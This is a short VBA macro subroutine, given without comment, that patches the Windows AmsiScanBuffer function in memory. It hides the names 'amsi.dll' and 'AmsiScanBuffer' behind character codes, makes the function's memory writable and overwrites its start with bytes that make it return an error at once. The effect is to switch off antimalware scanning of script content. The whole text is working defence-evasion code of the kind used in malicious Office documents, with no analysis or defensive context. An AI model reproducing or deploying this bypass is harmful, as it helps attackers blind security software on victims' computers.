Sub dop()
    Dim h As LongPtr
    Dim cs As String
    Dim rv As Long
    Dim mb(7) As Byte
    
    #If Win64 Then
        mb(0) = &HB8
        mb(1) = &H57
        mb(2) = &H0
        mb(3) = &H7
        mb(4) = &H80
        mb(5) = &HC3
    #Else
        mb(0) = &HB8
        mb(1) = &H57
        mb(2) = &H0
        mb(3) = &H7
        mb(4) = &H80
        mb(5) = &HC2
        mb(6) = &H18
        mb(7) = &H0
    #End If
    
    cs = Chr(97) & Chr(109) & Chr(115) & Chr(105) & Chr(46) & Chr(100) & Chr(108) & Chr(108)
    h = LoadLibrary(cs)
    
    Dim fn As String
    fn = Chr(65) & Mid("msiScanBuffer", 2)
    
    Dim addr As LongPtr
    addr = GetProcAddress(h, fn)
    
    If addr <> 0 Then
        Dim op As Long
        rv = VirtualProtect(ByVal addr, 8, &H40, op)
        
        If rv <> 0 Then
            #If Win64 Then
                CopyMem ByVal addr, mb(0), 6
            #Else
                CopyMem ByVal addr, mb(0), 8
            #End If
        End If
    End If
End Sub

